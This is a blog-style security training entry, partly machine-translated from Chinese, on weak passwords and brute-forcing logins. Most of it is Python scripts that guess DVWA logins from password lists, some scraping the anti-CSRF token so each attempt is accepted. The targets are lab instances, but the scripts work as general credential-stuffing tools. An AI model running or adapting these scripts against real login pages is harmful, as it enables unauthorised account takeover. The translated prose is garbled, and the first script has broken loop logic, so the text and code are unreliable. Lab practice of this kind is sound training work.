当前位置：网站首页>DAY17: weak password detection and test

DAY17: weak password detection and test

2022-07-30 04:30:00 【EdmunDJK】

DAY17：Detection and testing of weak passwords

Use the brute force cracking module to explode the directory

Use the brute force cracking module to blast the verification code

Use brute force to crack the module

FTP暴力破解

SSH密码暴力破解

Remote desktop brute force cracking

WIFI暴力破解（需要设备）

SMS verification code brute force cracking https://www.freebuf.com/articles/web/176701.html

https://www.freebuf.com/articles/web/228146.html

01 、弱口令定义

弱口令(weak password）There are strict and precise definitions,通常认为容易被别人（他们有可能对你很了解）猜测到或被破解工具破解的口令均为弱口令.

弱口令指的是仅包含简单数字和字母的口令,例如 “123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用.

Numerical or alphabetical order or reverse keyboard alphabetical order
123456
abcdef
123abc
qwerty

短语密码
5201314
iloveyou
woaini520

生日（姓名+生日）
19951223
lisi1009

Common administrator password
admin
admin123
root
password

02 、The dangers of weak passwords

In many places today by username(帐号)and passwords as authentication world,The importance of passwords can be imagined.The password is equivalent The key to enter the house,当他人有一把可以进入你家的钥匙,想想你的安全、your belongings、你的隐私…害怕了吧.Because weak passwords can be easily guessed or cracked by others,所以如果你使用弱口令,It's like putting the house key at the door of the house under the cushion,是非常危险的.

03 、暴力破解

暴力破解的原理就是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录.理论上来说,只要字典足够庞大,枚举总是能够成功的

04、爆破实例

4.1、简单爆破

一、使用burp抓取登录数据包,并发送至intruder

请添加图片描述

二、设置payload,导入字典,开始爆破

请添加图片描述

4.2、seacms Ignore the verification code blasting

一、后台地址为http://IP/admin,用户为admin,密码未知,使用burp 抓取登录包,发送至intruder,设置payload进行爆破

请添加图片描述

05、python 脚本使用

import requests
url = "http://5920517e-390c-4c21-8b65-010ecace4619.node4.buuoj.cn:81/vulnerabilities/brute/"#proxies= {"http":"http://127.0.0.1:8080"}输入网址
#代理设置,方便burp抓包查看,,,,,url填写
header = {
    
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'}
f = open('result.txt','w')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):               #账号 字典--绝对路径
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):            #密码 字典--绝对路径
        username = admin.strip()
        password = line.strip()
        payload = {
    'username':username,'password':password,"Login":'Login'}
        Response = requests.get(url,params=payload,headers=header)
    if not(Response.text.find('Welcome to the password protected area')==-1):
        result = username + ':' + password
        print(result)
f.write(result + '\n')
print('\n完成')

from bs4 import BeautifulSoup
import requests

url = "http://1647f7ed-06fe-49b5-936b-d052146a4e42.node4.buuoj.cn:81/vulnerabilities/brute/"
user_token = 'ab34360a044a8761ec431b16eb5223ce'
header = {
    
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    'Cookie': ' PHPSESSID=17u0i2fakm84eq9oc24boc8715 ; security=high '
}

def get_token(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token = soup.select('input[name="user_token"]')[0]['value']
    return user_token

if __name__ == "__main__":
    f = open('result.csv', 'w')     #把爆破结果储存到文件里,这里为csv格式
    f.write('用户名' + ',' + '密码' + ',' + '包长度' + '\n')    #给文件设置标题

    #遍历字典文件,暴力破解
    for admin in open("The absolute path of the account"):
        for line in open("Password dictionary absolute path"):
            username = admin.strip()
            password = line.strip()
            payload = {
         #payload为POST的数据
                'username': username,
                'password': password,
                'user_token': user_token,
                'Login': 'Login'
            }

            Response = requests.post(url, data=payload, headers=header)
            # print(Response)
            req=requests.get(url,params=payload,headers=header)
            print(req.headers)
            len1=Response.headers['Content-Length']
            result = username + ',' + password + ',' + str(len1)   #用户名密码以及响应包长度

            print(result)           #输出到终端
            f.write(result + '\n')  #输出到文件
            user_token = get_token(Response)    #调用get_token函数获取下一次循环需要的token
    print('\n完成\n')
    f.close()

low：

import requests

def read_txt(): #txtThe file is read as a list
    try:
        txtname = input(">>>输入txt文件名【例如name.txt】【It needs to be in the same folder as the script】\n： ")
        f = open(txtname, "r")
        lines = f.readlines()  # 读取全部内容 ,并以列表方式返回
        output = [x.strip() for x in lines]
    except:
        print(">>>>>警告！不存在该txt文件<<<<<")
        pass
    return output


url = "http://172.16.0.134/DVWA/vulnerabilities/brute/"
#url——DVWA low关卡

header = {
          #编写请求头
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Waterfox/56.6.2022.04',
    'Cookie':'security=low; user=admin; PHPSESSID=7e0d1aac877440784a5f98bd9fcc62fd'
}

f = open('返回包.csv','w')
f.write('状态码' + ',' + '用户名' + ',' + '密码' + ',' + 'content_length' + '\n')
#Generate tables to store various return packets

name_list=read_txt()
passwd_list=read_txt() #读取字典

for username in name_list:
    for password in passwd_list:

        payload = {
    'username':username,'password':password,"Login":'Login'}
        response = requests.get(url,params=payload,headers=header)
        content_length = response.headers['content-length']
        #print(content_length)
        result = str(response.status_code) + ',' + username + ','+ password + ',' + str(content_length)
        f.write(result + '\n')

f.close()
print('\n完成')

high：

Token在计算机身份认证中是令牌（临时）的意思,在词法分析中是标记的意思.一般作为邀请、登录系统使用

Token, 令牌,代表执行某些操作的权利的对象

访问令牌（Access token）表示访问控制操作主体的系统对象

邀请码在邀请系统中使用

Token, Petri 网（Petri net）理论中的Token

密保令牌（Security token）,或者硬件令牌,例如U盾,或者叫做认证令牌或者加密令牌,一种计算机身份校验的物理设备

会话令牌（Session token）,交互会话中唯一身份标识符

令牌化技术 (Tokenization), 取代敏感信息条目的处理过程

# -*- coding: utf-8 -*-
# author = 'K0ctr'
import requests
import re
from bs4 import BeautifulSoup

def read_txt(): #txtThe file is read as a list
    try:
        txtname = input(">>>输入txt文件名【例如name.txt】【It needs to be in the same folder as the script】\n： ")
        f = open(txtname, "r")
        lines = f.readlines()  # 读取全部内容 ,并以列表方式返回
        output = [x.strip() for x in lines]
    except:
        print(">>>>>警告！不存在该txt文件<<<<<")
        pass
    return output


ip = "172.16.0.134"
url = "http://%s/dvwa/vulnerabilities/brute/" % ip
headers = {
    
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Waterfox/56.6.2022.04',
    'Cookie': 'security=high; user=admin; PHPSESSID=7e0d1aac877440784a5f98bd9fcc62fd'
}   #编写请求头

name_list=read_txt()
passwd_list=read_txt() #读取字典
i=0

for username in name_list:
    if (i == 1): #退出器
        break

    for password in passwd_list:

        #Visit the brute force page,获取token;
        r = requests.get(url, headers=headers)
        soup = BeautifulSoup(r.text, "html.parser")
        token = soup.find_all("input")[3].get("value")  #获取token值

        #Constructs the request header for the second input,Take advantage of the first responsetoken
        get_data = {
    
            "user_token": token,
            "username": username.strip(),
            "password": password.strip(),
            "Login": "Login"
        }
        print('用户名：', username.strip())
        print('密码：', password.strip())
        #发送请求,Tried to log in
        r = requests.get(url, params=get_data, headers=headers)

        #Response packets are matched against text to determine correct and incorrect conditions
        if 'Username and/or password incorrect.' in r.text:
            print('>>>破解失败<<<')
        else:
            print('!!!!!!!!!!!!!!!!!!!!!!!!破解成功!!!!!!!!!!!!!!!!!!!!!!!!')
            print('-' * 20)
            i=1
            break
        print('-' * 20)

#-*- coding:utf-8 -*-
import requests
import time

dict_file=(r'D:\dir\PentesterSpecialDict-master\password-attacks\top10.txt')
u_name_list=['admin']
headers = {
    'Cookie':'security=high; PHPSESSID=cd2fhsr3h19lm0ipsqdgngj3fn','Referer':'http://127.0.0.1/test/dvwa/vulnerabilities/brute/'}

#访问login.phpThe file is used to get back to the web pageuser_token
def get_http(u_name,p_word):
    url = 'http://127.0.0.1/test/DVWA/login.php'
    req = requests.get(url,headers=headers)
    return(url,req.status_code,req.text)

#带user_token登陆
def get_login(u_name,p_word,user_token):
    url = "http://127.0.0.1/test/DVWA/vulnerabilities/brute/?username="+u_name+"&password="+p_word+"&Login=Login"+"&user_token="+user_token
    req = requests.post(url,headers=headers)
    return(url,req.status_code,req.text)
    
print('++++++++Start password brute force cracking++++++++')
for list in u_name_list:
    u_name=list
    print('------目前用户'+u_name)
    f = open(dict_file,'r')
    for line in f:
        p_word = line.strip()
        #第一次访问login.php
        url,status_code,result=get_http(u_name,p_word)
        #查找user_token字符串的位置
        start = result.find('user_token')
        #获取user_token值
        user_token = result[start+19:start+51]
        #user_token = re.findall("<input.*?value=\'(.*?)' />", result)[0]
        #带user_token登陆
        url,status_code,result=get_login(u_name,p_word,user_token)
        print(u_name+'|'+p_word+'|'+url+'|'+str(status_code)+'|'+str(len(result)))
        #print(result)
    f.close()
print('++++++++End password brute force cracking++++++++')